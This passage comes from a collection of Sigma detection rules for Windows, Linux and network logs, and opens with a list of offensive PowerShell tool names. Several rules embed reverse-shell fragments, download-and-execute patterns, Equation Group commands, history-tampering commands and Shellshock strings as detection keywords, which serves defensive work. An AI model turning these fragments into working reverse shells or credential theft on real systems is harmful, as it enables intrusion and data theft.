- Get-VulnSchTask
- Grant-ADIDNSPermission
- Gupt-Backdoor
- Invoke-ACLScanner
- Invoke-ADRecon
- Invoke-ADSBackdoor
- Invoke-AgentSmith
- Invoke-AllChecks
- Invoke-ARPScan
- Invoke-AzureHound
- Invoke-BackdoorLNK
- Invoke-BadPotato
- Invoke-BetterSafetyKatz
- Invoke-BypassUAC
- Invoke-Carbuncle
- Invoke-Certify
- Invoke-ConPtyShell
- Invoke-CredentialInjection
- Invoke-DAFT
- Invoke-DCSync
- Invoke-DinvokeKatz
- Invoke-DllInjection
- Invoke-DNSUpdate
- Invoke-DomainPasswordSpray
- Invoke-DowngradeAccount
- Invoke-EgressCheck
- Invoke-Eyewitness
- Invoke-FakeLogonScreen
- Invoke-Farmer
- Invoke-Get-RBCD-Threaded
- Invoke-Gopher
- Invoke-Grouper
- Invoke-HandleKatz
- Invoke-ImpersonatedProcess
- Invoke-ImpersonateSystem
- Invoke-InteractiveSystemPowerShell
- Invoke-Internalmonologue
- Invoke-Inveigh
- Invoke-InveighRelay
- Invoke-KrbRelay
- Invoke-LdapSignCheck
- Invoke-Lockless
- Invoke-MalSCCM
- Invoke-Mimikatz
- Invoke-Mimikittenz
- Invoke-MITM6
- Invoke-NanoDump
- Invoke-NetRipper
- Invoke-Nightmare
- Invoke-NinjaCopy
- Invoke-OfficeScrape
- Invoke-OxidResolver
- Invoke-P0wnedshell
- Invoke-Paranoia
- Invoke-PortScan
- Invoke-PoshRatHttp
- Invoke-PostExfil
- Invoke-PowerDump
- Invoke-PowerShellTCP
- Invoke-PowerShellWMI
- Invoke-PPLDump
- Invoke-PsExec
- Invoke-PSInject
- Invoke-PsUaCme
- Invoke-ReflectivePEInjection
- Invoke-ReverseDNSLookup
- Invoke-Rubeus
- Invoke-RunAs
- Invoke-SafetyKatz
- Invoke-SauronEye
- Invoke-SCShell
- Invoke-Seatbelt
- Invoke-ServiceAbuse
- Invoke-ShadowSpray
- Invoke-Sharp
- Invoke-Shellcode
- Invoke-SMBScanner
- Invoke-Snaffler
- Invoke-Spoolsample
- Invoke-SpraySinglePassword
- Invoke-SSHCommand
- Invoke-StandIn
- Invoke-StickyNotesExtract
- Invoke-SystemCommand
- Invoke-Tasksbackdoor
- Invoke-Tater
- Invoke-Thunderfox
- Invoke-ThunderStruck
- Invoke-TokenManipulation
- Invoke-Tokenvator
- Invoke-TotalExec
- Invoke-UrbanBishop
- Invoke-UserHunter
- Invoke-VoiceTroll
- Invoke-Whisker
- Invoke-WinEnum
- Invoke-winPEAS
- Invoke-WireTap
- Invoke-WmiCommand
- Invoke-WMIExec
- Invoke-WScriptBypassUAC
- Invoke-Zerologon
- MailRaider
- New-ADIDNSNode
- New-HoneyHash
- New-InMemoryModule
- New-SOASerialNumberArray
- Out-Minidump
- PowerBreach
- 'powercat '
- PowerUp
- PowerView
- Remove-ADIDNSNode
- Remove-Update
- Rename-ADIDNSNode
- Revoke-ADIDNSPermission
- Set-ADIDNSNode
- Show-TargetScreen
- Start-CaptureServer
- Start-Dnscat2
- Start-WebcamRecorder
- VolumeShadowCopyTools
Dump Credentials from Windows Credential Manager With PowerShell
- source: sigma
- technicques:
- t1555
Description
Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.
Detection logic
condition: 1 of selection_*
selection_kiddie:
ScriptBlockText|contains:
- Get-PasswordVaultCredentials
- Get-CredManCreds
selection_rename_Password:
ScriptBlockText|contains|all:
- New-Object
- Windows.Security.Credentials.PasswordVault
selection_rename_credman:
ScriptBlockText|contains|all:
- New-Object
- Microsoft.CSharp.CSharpCodeProvider
- '[System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())'
- Collections.ArrayList
- System.CodeDom.Compiler.CompilerParameters
PowerShell Script With File Upload Capabilities
- source: sigma
- technicques:
- t1020
Description
Detects PowerShell scripts leveraging the “Invoke-WebRequest” cmdlet to send data via either “PUT” or “POST” method.
Detection logic
condition: all of selection_*
selection_cmdlet:
ScriptBlockText|contains:
- Invoke-WebRequest
- 'iwr '
selection_flag:
ScriptBlockText|contains:
- -Method Put
- -Method Post
Powershell Install a DLL in System Directory
- source: sigma
- technicques:
- t1556
- t1556.002
Description
Uses PowerShell to install/copy a file into a system directory such as “System32” or “SysWOW64”
Detection logic
condition: selection
selection:
ScriptBlockText|re: (Copy-Item|cpi) .{2,128} -Destination .{1,32}\\Windows\\(System32|SysWOW64)
Linux Reverse Shell Indicator
- source: sigma
- technicques:
- t1059
- t1059.004
Description
Detects a bash contecting to a remote IP address (often found when actors do something like ‘bash -i >& /dev/tcp/10.0.0.1/4242 0>&1’)
Detection logic
condition: selection and not filter
filter:
DestinationIp:
- 127.0.0.1
- 0.0.0.0
selection:
Image|endswith: /bin/bash
Potentially Suspicious Malware Callback Communication - Linux
- source: sigma
- technicques:
- t1571
Description
Detects programs that connect to known malware callback ports based on threat intelligence reports.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_local_ranges:
DestinationIp|cidr:
- 127.0.0.0/8
- 10.0.0.0/8
- 172.16.0.0/12
- 192.168.0.0/16
- 169.254.0.0/16
- ::1/128
- fe80::/10
- fc00::/7
selection:
DestinationPort:
- 888
- 999
- 2200
- 2222
- 4000
- 4444
- 6789
- 8531
- 50501
- 51820
Initiated: 'true'
Suspicious Git Clone - Linux
- source: sigma
- technicques:
- t1593
- t1593.003
Description
Detects execution of “git” in order to clone a remote repository that contain suspicious keywords which might be suspicious
Detection logic
condition: all of selection_*
selection_img:
CommandLine|contains: ' clone '
Image|endswith: /git
selection_keyword:
CommandLine|contains:
- exploit
- Vulns
- vulnerability
- RCE
- RemoteCodeExecution
- Invoke-
- CVE-
- poc-
- ProofOfConcept
- proxyshell
- log4shell
- eternalblue
- eternal-blue
- MS17-
Potential Discovery Activity Using Find - Linux
- source: sigma
- technicques:
- t1083
Description
Detects usage of “find” binary in a suspicious manner to perform discovery
Detection logic
condition: selection
selection:
CommandLine|contains:
- -perm -4000
- -perm -2000
- -perm 0777
- -perm -222
- -perm -o w
- -perm -o x
- -perm -u=s
- -perm -g=s
Image|endswith: /find
Potential Python Reverse Shell
- source: sigma
- technicques:
Description
Detects executing python with keywords related to network activity that could indicate a potential reverse shell
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- ' -c '
- import
- pty
- spawn(
- .connect
Image|contains: python
Potential Ruby Reverse Shell
- source: sigma
- technicques:
Description
Detects execution of ruby with the “-e” flag and calls to “socket” related functions. This could be an indication of a potential attempt to setup a reverse shell
Detection logic
condition: selection
selection:
CommandLine|contains:
- ' ash'
- ' bash'
- ' bsh'
- ' csh'
- ' ksh'
- ' pdksh'
- ' sh'
- ' tcsh'
CommandLine|contains|all:
- ' -e'
- rsocket
- TCPSocket
Image|contains: ruby
Potential Linux Process Code Injection Via DD Utility
- source: sigma
- technicques:
- t1055
- t1055.009
Description
Detects the injection of code by overwriting the memory map of a Linux process using the “dd” Linux command.
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- of=
- /proc/
- /mem
Image|endswith: /dd
Potentially Suspicious Named Pipe Created Via Mkfifo
- source: sigma
- technicques:
Description
Detects the creation of a new named pipe using the “mkfifo” utility in a potentially suspicious location
Detection logic
condition: selection
selection:
CommandLine|contains: ' /tmp/'
Image|endswith: /mkfifo
Pnscan Binary Data Transmission Activity
- source: sigma
- technicques:
- t1046
Description
Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT
Detection logic
condition: selection
selection:
CommandLine|re: -(W|R)\s?(\s|"|')([0-9a-fA-F]{2}\s?){2,20}(\s|"|')
Remove Scheduled Cron Task/Job
- source: sigma
- technicques:
Description
Detects usage of the ‘crontab’ utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible
Detection logic
condition: selection
selection:
CommandLine|contains: ' -r'
Image|endswith: crontab
Execution Of Script Located In Potentially Suspicious Directory
- source: sigma
- technicques:
Description
Detects executions of scripts located in potentially suspicious locations such as “/tmp” via a shell such as “bash”, “sh”, etc.
Detection logic
condition: all of selection_*
selection_flag:
CommandLine|contains: ' -c '
selection_img:
Image|endswith:
- /bash
- /csh
- /dash
- /fish
- /ksh
- /sh
- /zsh
selection_paths:
CommandLine|contains: /tmp/
Potential GobRAT File Discovery Via Grep
- source: sigma
- technicques:
- t1082
Description
Detects the use of grep to discover specific files created by the GobRAT malware
Detection logic
condition: selection
selection:
CommandLine|contains:
- apached
- frpc
- sshd.sh
- zone.arm
Image|endswith: /grep
Download File To Potentially Suspicious Directory Via Wget
- source: sigma
- technicques:
- t1105
Description
Detects the use of wget to download content to a suspicious directory
Detection logic
condition: all of selection_*
selection_img:
Image|endswith: /wget
selection_output:
- CommandLine|re: \s-O\s
- CommandLine|contains: --output-document
selection_path:
CommandLine|contains: /tmp/
Potential Xterm Reverse Shell
- source: sigma
- technicques:
- t1059
Description
Detects usage of “xterm” as a potential reverse shell tunnel
Detection logic
condition: selection
selection:
CommandLine|contains: -display
CommandLine|endswith: :1
Image|contains: xterm
Suspicious Java Children Processes
- source: sigma
- technicques:
- t1059
Description
Detects java process spawning suspicious children
Detection logic
condition: selection
selection:
CommandLine|contains:
- /bin/sh
- bash
- dash
- ksh
- zsh
- csh
- fish
- curl
- wget
- python
ParentImage|endswith: /java
Vim GTFOBin Abuse - Linux
- source: sigma
- technicques:
- t1083
Description
Detects usage of “vim” and it’s siblings as a GTFOBin to execute and proxy command and binary execution
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- :!/
- ':py '
- ':lua '
- /bin/sh
- /bin/bash
- /bin/dash
- /bin/zsh
- /bin/fish
selection_img:
CommandLine|contains:
- ' -c '
- ' --cmd'
Image|endswith:
- /vim
- /rvim
- /vimdiff
Shell Execution Of Process Located In Tmp Directory
- source: sigma
- technicques:
Description
Detects execution of shells from a parent process located in a temporary (/tmp) directory
Detection logic
condition: selection
selection:
Image|endswith:
- /bash
- /csh
- /dash
- /fish
- /ksh
- /sh
- /zsh
ParentImage|startswith: /tmp/
Suspicious Nohup Execution
- source: sigma
- technicques:
Description
Detects execution of binaries located in potentially suspicious locations via “nohup”
Detection logic
condition: selection
selection:
CommandLine|contains: /tmp/
Image|endswith: /nohup
Capabilities Discovery - Linux
- source: sigma
- technicques:
- t1083
Description
Detects usage of “getcap” binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.
Detection logic
condition: selection
selection:
CommandLine|contains|windash: ' -r '
Image|endswith: /getcap
OS Architecture Discovery Via Grep
- source: sigma
- technicques:
- t1082
Description
Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of “uname” or “cat /proc/cpuinfo”
Detection logic
condition: all of selection_*
selection_architecture:
CommandLine|endswith:
- aarch64
- arm
- i386
- i686
- mips
- x86_64
selection_process:
Image|endswith: /grep
Enable BPF Kprobes Tracing
- source: sigma
- technicques:
Description
Detects common command used to enable bpf kprobes tracing
Detection logic
condition: selection
selection:
CommandLine|contains:
- /myprobe/enable
- /myretprobe/enable
CommandLine|contains|all:
- echo 1 >
- /sys/kernel/debug/tracing/events/kprobes/
Copy Passwd Or Shadow From TMP Path
- source: sigma
- technicques:
- t1552
- t1552.001
Description
Detects when the file “passwd” or “shadow” is copied from tmp path
Detection logic
condition: all of selection_*
selection_file:
CommandLine|contains:
- passwd
- shadow
selection_img:
Image|endswith: /cp
selection_path:
CommandLine|contains: /tmp/
Atlassian Confluence CVE-2022-26134
- source: sigma
- technicques:
- t1059
- t1190
Description
Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
Detection logic
condition: selection
selection:
CommandLine|contains:
- /bin/sh
- bash
- dash
- ksh
- zsh
- csh
- fish
- curl
- wget
- python
ParentImage|endswith: /java
ParentImage|startswith: /opt/atlassian/confluence/
Potentially Suspicious Execution From Tmp Folder
- source: sigma
- technicques:
- t1036
Description
Detects a potentially suspicious execution of a process located in the ‘/tmp/’ folder
Detection logic
condition: selection
selection:
Image|startswith: /tmp/
Python Spawning Pretty TTY
- source: sigma
- technicques:
- t1059
Description
Detects python spawning a pretty tty which could be indicative of potential reverse shell activity
Detection logic
condition: selection_img and 1 of selection_cli_*
selection_cli_1:
CommandLine|contains|all:
- import pty
- .spawn(
selection_cli_2:
CommandLine|contains: from pty import spawn
selection_img:
- Image|endswith:
- /python
- /python2
- /python3
- Image|contains:
- /python2.
- /python3.
Bash Interactive Shell
- source: sigma
- technicques:
Description
Detects execution of the bash shell with the interactive flag “-i”.
Detection logic
condition: selection
selection:
CommandLine|contains: ' -i '
Image|endswith: /bash
Named Pipe Created Via Mkfifo
- source: sigma
- technicques:
Description
Detects the creation of a new named pipe using the “mkfifo” utility
Detection logic
condition: selection
selection:
Image|endswith: /mkfifo
Mount Execution With Hidepid Parameter
- source: sigma
- technicques:
- t1564
Description
Detects execution of the “mount” command with “hidepid” parameter to make invisible processes to other users from the system
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- hidepid=2
- ' -o '
Image|endswith: /mount
Potential PHP Reverse Shell
- source: sigma
- technicques:
Description
Detects usage of the PHP CLI with the “-r” flag which allows it to run inline PHP code. The rule looks for calls to the “fsockopen” function which allows the creation of sockets. Attackers often leverage this in combination with functions such as “exec” or “fopen” to initiate a reverse shell connection.
Detection logic
condition: selection
selection:
CommandLine|contains:
- ash
- bash
- bsh
- csh
- ksh
- pdksh
- sh
- tcsh
- zsh
CommandLine|contains|all:
- ' -r '
- fsockopen
Image|contains: /php
Apt GTFOBin Abuse - Linux
- source: sigma
- technicques:
- t1083
Description
Detects usage of “apt” and “apt-get” as a GTFOBin to execute and proxy command and binary execution
Detection logic
condition: selection
selection:
CommandLine|contains: APT::Update::Pre-Invoke::=
Image|endswith:
- /apt
- /apt-get
Linux Command History Tampering
- source: sigma
- technicques:
- t1070
- t1070.003
Description
Detects commands that try to clear or tamper with the Linux command history. This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as “bash_history” or “zsh_history”.
Detection logic
condition: keywords
keywords:
- cat /dev/null >*sh_history
- cat /dev/zero >*sh_history
- chattr +i*sh_history
- echo "" >*sh_history
- empty_bash_history
- export HISTFILESIZE=0
- history -c
- history -w
- ln -sf /dev/null *sh_history
- ln -sf /dev/zero *sh_history
- rm *sh_history
- shopt -ou history
- shopt -uo history
- shred *sh_history
- truncate -s0 *sh_history
Symlink Etc Passwd
- source: sigma
- technicques:
- t1204
- t1204.001
Description
Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd
Detection logic
condition: keywords
keywords:
- ln -s -f /etc/passwd
- ln -s /etc/passwd
Suspicious Use of /dev/tcp
- source: sigma
- technicques:
Description
Detects suspicious command with /dev/tcp
Detection logic
condition: keywords
keywords:
- cat </dev/tcp/
- exec 3<>/dev/tcp/
- echo >/dev/tcp/
- bash -i >& /dev/tcp/
- sh -i >& /dev/udp/
- 0<&196;exec 196<>/dev/tcp/
- exec 5<>/dev/tcp/
- (sh)0>/dev/tcp/
- bash -c 'bash -i >& /dev/tcp/
- echo -e '#!/bin/bash\nbash -i >& /dev/tcp/
Suspicious Reverse Shell Command Line
- source: sigma
- technicques:
- t1059
- t1059.004
Description
Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell
Detection logic
condition: keywords
keywords:
- BEGIN {s = "/inet/tcp/0/
- bash -i >& /dev/tcp/
- bash -i >& /dev/udp/
- sh -i >$ /dev/udp/
- sh -i >$ /dev/tcp/
- '&& while read line 0<&5; do'
- /bin/bash -c exec 5<>/dev/tcp/
- /bin/bash -c exec 5<>/dev/udp/
- 'nc -e /bin/sh '
- /bin/sh | nc
- 'rm -f backpipe; mknod /tmp/backpipe p && nc '
- ;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))
- ;STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;
- /bin/sh -i <&3 >&3 2>&3
- uname -a; w; id; /bin/bash -i
- $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()};
- ;os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv('HISTFILE','/dev/null');
- .to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)
- ;while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print
- 'socat exec:''bash -li'',pty,stderr,setsid,sigint,sane tcp:'
- rm -f /tmp/p; mknod /tmp/p p &&
- ' | /bin/bash | telnet '
- ',echo=0,raw tcp-listen:'
- 'nc -lvvp '
- xterm -display 1
Equation Group Indicators
- source: sigma
- technicques:
- t1059
- t1059.004
Description
Detects suspicious shell commands used in various Equation Group scripts and tools
Detection logic
condition: keywords
keywords:
- 'chown root*chmod 4777 '
- cp /bin/sh .;chown
- chmod 4777 /tmp/.scsi/dev/bin/gsh
- chown root:root /tmp/.scsi/dev/bin/
- chown root:root x;
- /bin/telnet locip locport < /dev/console | /bin/sh
- /tmp/ratload
- 'ewok -t '
- 'xspy -display '
- cat > /dev/tcp/127.0.0.1/80 <<END
- rm -f /current/tmp/ftshell.latest
- 'ghost_* -v '
- ' --wipe > /dev/null'
- ping -c 2 *; grep * /proc/net/arp >/tmp/gx
- iptables * OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;
- '> /var/log/audit/audit.log; rm -f .'
- cp /var/log/audit/audit.log .tmp
- sh >/dev/tcp/* <&1 2>&1
- ncat -vv -l -p * <
- nc -vv -l -p * <
- < /dev/console | uudecode && uncompress
- sendmail -osendmail;chmod +x sendmail
- /usr/bin/wget -O /tmp/a http* && chmod 755 /tmp/cron
- chmod 666 /var/run/utmp~
- chmod 700 nscd crond
- cp /etc/shadow /tmp/.
- </dev/console |uudecode > /dev/null 2>&1 && uncompress
- chmod 700 jp&&netstat -an|grep
- uudecode > /dev/null 2>&1 && uncompress -f * && chmod 755
- chmod 700 crond
- wget http*; chmod +x /tmp/sendmail
- chmod 700 fp sendmail pt
- chmod 755 /usr/vmsys/bin/pipe
- chmod -R 755 /usr/vmsys
- chmod 755 $opbin/*tunnel
- chmod 700 sendmail
- chmod 0700 sendmail
- /usr/bin/wget http*sendmail;chmod +x sendmail;
- '&& telnet * 2>&1 </dev/console'
Nimbuspwn Exploitation
- source: sigma
- technicques:
- t1068
Description
Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)
Detection logic
condition: keywords
keywords:
'|all':
- networkd-dispatcher
- Error handling notification for interface
- ../../
Buffer Overflow Attempts
- source: sigma
- technicques:
- t1068
Description
Detects buffer overflow attempts in Unix system log files
Detection logic
condition: keywords
keywords:
- attempt to execute code on stack by
- FTP LOGIN FROM .* 0bin0sh
- 'rpc.statd[\d+]: gethostbyname error for'
- AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
JexBoss Command Sequence
- source: sigma
- technicques:
- t1059
- t1059.004
Description
Detects suspicious command sequence that JexBoss
Detection logic
condition: all of selection*
selection1:
- bash -c /bin/bash
selection2:
- '&/dev/tcp/'
Suspicious Activity in Shell Commands
- source: sigma
- technicques:
- t1059
- t1059.004
Description
Detects suspicious shell commands used in various exploit codes (see references)
Detection logic
condition: keywords
keywords:
- wget * - http* | perl
- wget * - http* | sh
- wget * - http* | bash
- python -m SimpleHTTPServer
- -m http.server
- import pty; pty.spawn*
- socat exec:*
- socat -O /tmp/*
- socat tcp-connect*
- '*echo binary >>*'
- '*wget *; chmod +x*'
- '*wget *; chmod 777 *'
- '*cd /tmp || cd /var/run || cd /mnt*'
- '*stop;service iptables stop;*'
- '*stop;SuSEfirewall2 stop;*'
- chmod 777 2020*
- '*>>/etc/rc.local'
- '*base64 -d /tmp/*'
- '* | base64 -d *'
- '*/chmod u+s *'
- '*chmod +s /tmp/*'
- '*chmod u+s /tmp/*'
- '* /tmp/haxhax*'
- '* /tmp/ns_sploit*'
- nc -l -p *
- cp /bin/ksh *
- cp /bin/sh *
- '* /tmp/*.b64 *'
- '*/tmp/ysocereal.jar*'
- '*/tmp/x *'
- '*; chmod +x /tmp/*'
- '*;chmod +x /tmp/*'
Shellshock Expression
- source: sigma
- technicques:
- t1505
- t1505.003
Description
Detects shellshock expressions in log files
Detection logic
condition: keywords
keywords:
- (){:;};
- () {:;};
- () { :;};
- () { :; };
Potential Suspicious BPF Activity - Linux
- source: sigma
- technicques:
Description
Detects the presence of “bpf_probe_write_user” BPF helper-generated warning messages. Which could be a sign of suspicious eBPF activity on the system.
Detection logic
condition: selection
selection:
- bpf_probe_write_user
Suspicious Log Entries
- source: sigma
- technicques:
Description
Detects suspicious log entries in Linux log files
Detection logic
condition: keywords
keywords:
- entered promiscuous mode
- Deactivating service
- Oversized packet received from
- imuxsock begins to drop messages
Relevant ClamAV Message
- source: sigma
- technicques:
- t1588
- t1588.001
Description
Detects relevant ClamAV messages
Detection logic
condition: keywords
keywords:
- Trojan*FOUND
- VirTool*FOUND
- Webshell*FOUND
- Rootkit*FOUND
- Htran*FOUND
PwnKit Local Privilege Escalation
- source: sigma
- technicques:
- t1548
- t1548.001
Description
Detects potential PwnKit exploitation CVE-2021-4034 in auth logs
Detection logic
condition: keywords
keywords:
'|all':
- pkexec
- The value for environment variable XAUTHORITY contains suscipious content
- '[USER=root] [TTY=/dev/pts/0]'
Guacamole Two Users Sharing Session Anomaly
- source: sigma
- technicques:
- t1212
Description
Detects suspicious session with two users present
Detection logic
condition: selection
selection:
- (2 users now present)
Suspicious OpenSSH Daemon Error
- source: sigma
- technicques:
- t1190
Description
Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
Detection logic
condition: keywords
keywords:
- unexpected internal error
- unknown or unsupported key type
- invalid certificate signing key
- invalid elliptic curve value
- incorrect signature
- error in libcrypto
- unexpected bytes remain after decoding
- 'fatal: buffer_get_string: bad string'
- 'Local: crc32 compensation attack'
- bad client public DH value
- Corrupted MAC on input
SSHD Error Message CVE-2018-15473
- source: sigma
- technicques:
- t1589
Description
Detects exploitation attempt using public exploit code for CVE-2018-15473
Detection logic
condition: keywords
keywords:
- 'error: buffer_get_ret: trying to get more bytes 1907 than in buffer 308 [preauth]'
Suspicious Named Error
- source: sigma
- technicques:
- t1190
Description
Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
Detection logic
condition: keywords
keywords:
- ' dropping source port zero packet from '
- ' denied AXFR from '
- ' exiting (due to fatal error)'
Suspicious VSFTPD Error Messages
- source: sigma
- technicques:
- t1190
Description
Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
Detection logic
condition: keywords
keywords:
- 'Connection refused: too many sessions for this address.'
- 'Connection refused: tcp_wrappers denial.'
- Bad HTTP verb.
- port and pasv both active
- pasv and port both active
- Transfer done (but failed to open directory).
- Could not set file modification time.
- 'bug: pid active in ptrace_sandbox_free'
- PTRACE_SETOPTIONS failure
- 'weird status:'
- couldn't handle sandbox event
- syscall * out of bounds
- 'syscall not permitted:'
- 'syscall validate failed:'
- Input line too long.
- poor buffer accounting in str_netfd_alloc
- vsf_sysutil_read_loop
Audio Capture
- source: sigma
- technicques:
- t1123
Description
Detects attempts to record audio with arecord utility
Detection logic
condition: selection
selection:
a0: arecord
a1: -vv
a2: -fdat
type: EXECVE
Steganography Hide Zip Information in Picture File
- source: sigma
- technicques:
- t1027
- t1027.003
Description
Detects appending of zip file to image
Detection logic
a1:
a1|endswith:
- .jpg
- .png
a2:
a2|endswith: .zip
commands:
a0: cat
type: EXECVE
condition: commands and a1 and a2
Steganography Extract Files with Steghide
- source: sigma
- technicques:
- t1027
- t1027.003
Description
Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.
Detection logic
condition: selection
selection:
a0: steghide
a1: extract
a2: -sf
a3|endswith:
- .jpg
- .png
type: EXECVE
Steganography Unzip Hidden Information From Picture File
- source: sigma
- technicques:
- t1027
- t1027.003
Description
Detects extracting of zip file from image file
Detection logic
a1:
a1|endswith:
- .jpg
- .png
commands:
a0: unzip
type: EXECVE
condition: commands and a1
Loading of Kernel Module via Insmod
- source: sigma
- technicques:
- t1547
- t1547.006
Description
Detects loading of kernel modules with insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. Adversaries may use LKMs to obtain persistence within the system or elevate the privileges.
Detection logic
condition: selection
selection:
comm: insmod
exe: /usr/bin/kmod
type: SYSCALL
Steganography Hide Files with Steghide
- source: sigma
- technicques:
- t1027
- t1027.003
Description
Detects embedding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.
Detection logic
condition: selection
selection:
a0: steghide
a1: embed
a2:
- -cf
- -ef
a4:
- -cf
- -ef
type: EXECVE
Modification of ld.so.preload
- source: sigma
- technicques:
- t1574
- t1574.006
Description
Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.
Detection logic
condition: selection
selection:
name: /etc/ld.so.preload
type: PATH
Binary Padding - Linux
- source: sigma
- technicques:
- t1027
- t1027.001
Description
Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.
Detection logic
condition: selection_execve and (keywords_truncate or (keywords_dd and not keywords_filter))
keywords_dd:
'|all':
- dd
- if=
keywords_filter:
- of=
keywords_truncate:
'|all':
- truncate
- -s
selection_execve:
type: EXECVE
Credentials In Files - Linux
- source: sigma
- technicques:
- t1552
- t1552.001
Description
Detecting attempts to extract passwords with grep
Detection logic
condition: selection and keywords
keywords:
'|all':
- grep
- password
selection:
type: EXECVE
Use Of Hidden Paths Or Files
- source: sigma
- technicques:
- t1574
- t1574.001
Description
Detects calls to hidden files or files located in hidden directories in NIX systems.
Detection logic
condition: selection and not filter
filter:
name|contains:
- /.cache/
- /.config/
- /.pyenv/
- /.rustup/toolchains
selection:
name|contains: /.
type: PATH
Linux Capabilities Discovery
- source: sigma
- technicques:
- t1123
- t1548
Description
Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.
Detection logic
condition: selection
selection:
a0: getcap
a1: -r
a2: /
type: EXECVE
File Time Attribute Change - Linux
- source: sigma
- technicques:
- t1070
- t1070.006
Description
Detect file time attribute change to hide new or changes to existing files.
Detection logic
condition: execve and touch and selection2
execve:
type: EXECVE
selection2:
- -t
- -acmr
- -d
- -r
touch:
- touch
Hidden Files and Directories
- source: sigma
- technicques:
- t1564
- t1564.001
Description
Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character
Detection logic
arguments:
- a1|contains: /.
- a1|startswith: .
- a2|contains: /.
- a2|startswith: .
commands:
a0:
- mkdir
- touch
- vim
- nano
- vi
type: EXECVE
condition: commands and arguments
Cleartext Protocol Usage Via Netflow
- source: sigma
- technicques:
Description
Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.
Detection logic
condition: selection
selection:
destination.port:
- 8080
- 21
- 80
- 23
- 50000
- 1521
- 27017
- 1433
- 11211
- 3306
- 15672
- 5900
- 5901
- 5902
- 5903
- 5904
Default Credentials Usage
- source: sigma
- technicques:
Description
Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts. Sigma detects default credentials usage. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.
Detection logic
condition: selection
selection:
host.scan.vuln:
- 10693
- 11507
- 11633
- 11804
- 11821
- 11847
- 11867
- 11931
- 11935
- 11950
- 12541
- 12558
- 12559
- 12560
- 12562
- 12563
- 12565
- 12587
- 12590
- 12599
- 12702
- 12705
- 12706
- 12907
- 12928
- 12929
- 13053
- 13178
- 13200
- 13218
- 13241
- 13253
- 13274
- 13296
- 13301
- 13327
- 13373
- 13374
- 13409
- 13530
- 13532
- 20065
- 20073
- 20081
- 27202
- 27358
- 38702
- 38719
- 42045
- 42417
- 43029
- 43220
- 43221
- 43222
- 43223
- 43225
- 43246
- 43431
- 43484
- 86857
- 87098
- 87106
Recon Activity via SASec
- source: sigma
- technicques:
Description
Detects remote RPC calls to read information about scheduled tasks via SASec
Detection logic
condition: selection and not filter
filter:
OpNum:
- 0
- 1
selection:
EventID: 3
EventLog: RPCFW
InterfaceUuid: 378e52b0-c0a9-11cf-822d-00aa0051e40f
Remote Schedule Task Recon via ITaskSchedulerService
- source: sigma
- technicques:
Description
Detects remote RPC calls to read information about scheduled tasks
Detection logic
condition: selection and not filter
filter:
OpNum:
- 1
- 3
- 4
- 10
- 11
- 12
- 13
- 14
- 15
selection:
EventID: 3
EventLog: RPCFW
InterfaceUuid: 86d35949-83c9-4044-b424-db363231fd0c
Remote Schedule Task Recon via AtScv
- source: sigma
- technicques:
Description
Detects remote RPC calls to read information about scheduled tasks via AtScv
Detection logic
condition: selection and not filter
filter:
OpNum:
- 0
- 1
selection:
EventID: 3
EventLog: RPCFW
InterfaceUuid: 1ff70682-0a51-30e8-076d-740be8cee98b
SharpHound Recon Sessions
- source: sigma
- technicques:
- t1033
Description
Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.
Detection logic
condition: selection
selection:
EventID: 3
EventLog: RPCFW
InterfaceUuid: 4b324fc8-1670-01d3-1278-5a47bf6ee188
OpNum: 12
Possible DCSync Attack
- source: sigma
- technicques:
- t1033
Description
Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.
Detection logic
condition: selection and not filter
filter:
OpNum:
- 0
- 1
- 12
selection:
EventID: 3
